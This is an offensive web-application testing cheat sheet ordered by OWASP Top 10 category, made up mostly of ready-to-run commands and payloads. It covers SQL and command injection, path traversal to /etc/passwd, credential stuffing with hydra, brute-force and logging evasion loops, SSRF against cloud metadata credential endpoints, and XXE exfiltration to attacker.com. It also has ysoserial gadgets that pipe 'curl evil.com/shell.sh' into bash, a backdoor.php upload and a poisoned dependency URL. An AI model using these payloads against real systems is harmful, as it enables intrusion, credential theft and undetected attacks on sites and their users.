Where to find: Across entire application after authentication Theory: Controls who can access what; broken when users can access resources they shouldn't.
# 1. IDOR (In-Direct Object Reference) Testing
# Change numeric IDs in URLs/parameters
curl "https://site.com/user/1337" # Try other numbers
curl "https://site.com/api/user?id=1001"
curl "https://site.com/download?file=../../etc/passwd"
# 2. Missing Function Level Access Control
# Access admin endpoints as regular user
curl -H "User-Type: admin" https://site.com/admin/deleteAll
curl -c cookies.txt "https://site.com/login" -d "user=normal&pass=pass"
curl -b cookies.txt "https://site.com/admin/panel"
# 3. Parameter Tampering
# Modify user_id parameter
https://site.com/account?user_id=ATTACKER_ID
POST /update_profile HTTP/1.1
Content-Type: application/json
{"user_id": "victim_id", "email": "attacker@evil.com"}Attack Surface: URL parameters, API endpoints, file references, UUIDs, session tokens, HTTP headers.
Where to find: Data transmission & storage points Theory: Sensitive data exposure due to weak/no encryption.
# 1. Check for Cleartext Transmission
curl -k -v https://site.com # Check for HTTP, weak TLS
nmap --script ssl-enum-ciphers -p 443 target.com
openssl s_client -connect target.com:443 -tls1 # Test old protocols
# 2. Credit Card/SSN Detection
grep -r "[0-9]\{16\}" /var/www/html/* # Find stored CC
tcpdump -i eth0 -A | grep -E "password|ssn|credit"
# 3. Weak Algorithm Detection
# Check JWT tokens in cookies
echo "eyJhbGciOiJIUzI1NiIs..." | base64 -d
# Look for: HS256 (weak secret), none algorithm, RS256 with weak keys
# 4. Manual Testing
# Force HTTP when HTTPS available
curl -L http://site.com/login # Check redirect
# Test HSTS missing
curl -I https://site.com | grep Strict-Transport-SecurityAttack Surface: Login pages, payment forms, API endpoints, cookies, data exports, backup files.
Where to find: User input fields, parameters, file uploads Theory: Untrusted data sent to interpreter executes as commands.
# 1. Basic Testing
curl "https://site.com/products?id=1' OR '1'='1"
curl "https://site.com/search" -d "query=' UNION SELECT null--"
# 2. Time-Based Blind SQLi
curl "https://site.com/product?id=1' AND SLEEP(5)--"
curl "https://site.com/login" -d "user=admin' AND IF(1=1,SLEEP(5),0)--"
# 3. Automated Tools
sqlmap -u "https://site.com/product?id=1" --dbs
sqlmap -u "https://site.com/search" --data="query=test" --batch
# 4. Second-Order Injection (stored)
# Register with: username = admin'--
# Then change admin password through "forgot password"Attack Surface: Login forms, search boxes, product filters, URL parameters, cookie values.
# 1. Basic Command Injection
curl "https://site.com/ping?ip=127.0.0.1;whoami"
curl "https://site.com/export?name=test.pdf;cat /etc/passwd"
# 2. Using Special Characters
& # Background execution (Windows/Linux)
| # Pipe output
` # Backticks execution
$(command) # Command substitution
# 3. Blind Command Injection
curl "https://site.com/ping?ip=127.0.0.1$(sleep+5)"
curl "https://site.com/api/convert?url=https://evil.com/`id`"Attack Surface: System integration features, file uploads, admin panels, ping tools, report generators.
Where to find: Business logic flows, workflow sequences Theory: Missing/ineffective security controls in design phase.
# 1. Business Logic Bypass
# Rate limiting bypass
for i in {1..1000}; do
curl -X POST "https://site.com/vote" -d "poll_id=1&choice=attacker"
done
# 2. Workflow Bypass
# Skip steps in multi-step process
curl -X POST "https://site.com/checkout/step4" # Skip steps 1-3
# 3. Price Manipulation
# Intercept and modify price parameter
POST /cart/checkout HTTP/1.1
{"items":[{"id":1,"price":0.01,"quantity":10}]}
# 4. Negative Testing
# Create user with negative balance
curl -X POST "https://site.com/transfer" -d "amount=-1000"
# Buy negative quantity
curl "https://site.com/add-to-cart?id=1&quantity=-5"Attack Surface: Shopping carts, voting systems, multi-step forms, financial transactions, booking systems.
Where to find: Default pages, debug endpoints, headers Theory: Improperly configured security settings.
# 1. Directory Listing Enabled
curl "https://site.com/images/" # Lists files
curl "https://site.com/.git/" # Git repo exposed
curl "https://site.com/backup/" # Backup files
# 2. Default Credentials
hydra -l admin -p admin ftp://target.com
hydra -L users.txt -P passwords.txt http-post-form://site.com/login:"user=^USER^&pass=^PASS^"
# 3. Verbose Error Messages
curl "https://site.com/user/'"
# Look for: stack traces, SQL errors, internal paths
# 4. Unnecessary Services/Ports
nmap -sV -p- target.com
# Check for: 21/FTP, 161/SNMP, 873/rsync, 5985/WinRM
# 5. HTTP Methods Testing
curl -X TRACE https://site.com
curl -X PUT https://site.com/test.html -d "malicious"
curl -X OPTIONS https://site.comAttack Surface: Admin interfaces, configuration files, error pages, HTTP headers, exposed ports.
Where to find: JavaScript libraries, server frameworks, CMS plugins Theory: Using components with known vulnerabilities.
# 1. Version Detection
curl -s https://site.com | grep -i "jquery\|react\|angular"
curl -I https://site.com | grep -i "server\|x-powered-by"
whatweb https://site.com # Automated fingerprinting
# 2. Known Exploits
# Search Exploit-DB for specific versions
searchsploit wordpress 5.0
searchsploit apache 2.4
# 3. Dependency Checking
# Check package.json, composer.json, requirements.txt
curl "https://site.com/package.json"
curl "https://site.com/composer.lock"
# 4. CMS/Plugin Scanning
wpscan --url https://site.com --enumerate p,t,u
droopescan scan drupal -u https://site.comAttack Surface: JavaScript files, server headers, README files, login pages with framework branding.
Where to find: Login, registration, password reset, session management Theory: Weak authentication mechanisms allow credential bypass.
# 1. Credential Stuffing
# Use breached password lists
hydra -L emails.txt -P passwords.txt https-post-form://site.com/login:"username=^USER^&password=^PASS^:F=incorrect"
# 2. Weak Password Policy Testing
curl -X POST "https://site.com/register" -d "user=test&pass=123456"
curl -X POST "https://site.com/register" -d "user=test&pass=password"
curl -X POST "https://site.com/register" -d "user=admin&pass=admin"
# 3. Password Reset Abuse
# Predictable reset tokens
curl "https://site.com/reset?token=000000"
curl "https://site.com/reset?token=$(date +%Y%m%d)"
# 4. Session Hijacking
# Non-random session IDs
for i in {1..100}; do
curl -c cookie$i.txt "https://site.com/login" -d "user=test&pass=test"
done
# Compare session IDs
# 5. Brute Force Protection Bypass
# Add X-Forwarded-For header rotation
curl -H "X-Forwarded-For: 1.2.3.$RANDOM" "https://site.com/login" -d "user=admin&pass=guess"Attack Surface: Login forms, password reset pages, registration forms, session cookies, JWT tokens.
Where to find: Update mechanisms, CI/CD pipelines, deserialization Theory: Code/infra integrity failures allow unauthorized modifications.
# 1. Insecure Deserialization
# Java/PHP/.NET object injection
curl -X POST "https://site.com/api/user" -H "Content-Type: application/java" --data-binary "@payload.ser"
curl "https://site.com/profile?data=rO0ABXcEAAAA" # Base64 encoded serialized object
# 2. Code/Update Integrity
# Check if updates are over HTTP
curl -I http://updates.site.com/latest.zip
# Try to upload malicious update
curl -X PUT http://dev.site.com/upload -F "file=@backdoor.php"
# 3. Dependency Substitution
# Poison package repositories
# In package.json: "dep": "http://evil.com/malicious-package.tgz"
# 4. Deserialization Testing Tools
ysoserial.exe -g CommonsCollections1 -c "cmd.exe /c calc.exe"
java -jar ysoserial.jar CommonsCollections1 'curl evil.com/shell.sh | bash'Attack Surface: API endpoints accepting serialized objects, update endpoints, build servers, package managers.
Where to find: Log files, monitoring systems, alert mechanisms Theory: Lack of logging enables undetected attacks.
# 1. Test Log Injection
curl "https://site.com/search?q=<script>alert(1)</script>"
curl "https://site.com/user?name=admin\n[SUCCESS] Password changed"
# 2. Evade Logging
# Use encoded payloads
curl "https://site.com/admin'%20OR%20'1'%3D'1"
# Slow attacks to avoid rate-based detection
for i in $(cat passwords.txt); do
curl -s "https://site.com/login" -d "user=admin&pass=$i"
sleep 30
done
# 3. Log File Access
curl "https://site.com/logs/access.log"
curl "https://site.com/../var/log/apache2/error.log"
# 4. Time-Based Attack Evasion
# Stagger requests over long period
while read pass; do
curl "https://site.com/login" -d "user=admin&pass=$pass" &
sleep $((RANDOM % 60 + 30))
done < passwords.txtAttack Surface: All user inputs, especially those that might be logged (login attempts, search queries, form submissions).
Where to find: URL parameters, webhooks, import features Theory: Application fetches external resources based on user input.
# 1. Basic SSRF Testing
curl "https://site.com/fetch?url=http://169.254.169.254/latest/meta-data/"
curl "https://site.com/export?url=file:///etc/passwd"
curl "https://site.com/webhook?url=http://attacker.com/steal"
# 2. Advanced SSRF Bypasses
# Using encoding
curl "https://site.com/load?url=http://0177.0.0.1/" # Octal
curl "https://site.com/load?url=http://0x7f.0x0.0x0.0x1" # Hex
curl "https://site.com/load?url=http://127.1" # Short notation
# 3. Cloud Metadata Access
# AWS
curl "https://site.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
# GCP
curl "https://site.com/proxy?url=http://metadata.google.internal/computeMetadata/v1/"
# Azure
curl "https://site.com/proxy?url=http://169.254.169.254/metadata/instance?api-version=2017-04-02"
# 4. Port Scanning via SSRF
for port in {1..1000}; do
curl -s "https://site.com/fetch?url=http://127.0.0.1:$port" | grep -q "connected" && echo "Port $port open"
doneAttack Surface: Image uploads, document processors, webhook configurations, API integrations, PDF generators.
Where to find: XML parsers, file uploads, SOAP endpoints Theory: Poorly configured XML parser processes external entities.
# 1. Basic XXE Payload
curl -X POST "https://site.com/xml-parser" -H "Content-Type: application/xml" -d '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'
# 2. XXE for SSRF
curl -X POST "https://site.com/upload" -H "Content-Type: application/xml" -d '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><root>&xxe;</root>'
# 3. Blind XXE with Out-of-Band
curl -X POST "https://site.com/parse" -d '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]>'
# evil.dtd:
# <!ENTITY % file SYSTEM "file:///etc/passwd">
# <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?x=%file;'>">
# %eval;
# %exfil;Attack Surface: XML-based APIs, document uploads (DOCX, PDF), SOAP services, RSS readers.
# Comprehensive Scan
nikto -h https://site.com
nuclei -u https://site.com -t /nuclei-templates/
# API Testing
./ffuf -u https://site.com/api/FUZZ -w api_endpoints.txt
arjun -u https://site.com/api/user --get
# Auth Testing
crackmapexec smb target.com -u users.txt -p passwords.txt
patator http_fuzz url=https://site.com/login method=POST body='user=FILE0&pass=FILE1' 0=users.txt 1=passwords.txt
# Custom Script for OWASP Top 10
#!/bin/bash
URL=$1
echo "Testing $URL for OWASP Top 10..."
# Injection
sqlmap -u "$URL?id=1" --batch --level=1
# XSS
xsstrike -u "$URL/search?q=test"
# SSRF
curl -s "$URL/fetch?url=http://169.254.169.254" | grep -i "ami\|instance"
# IDOR
for i in {1000..1100}; do curl -s "$URL/user/$i"; done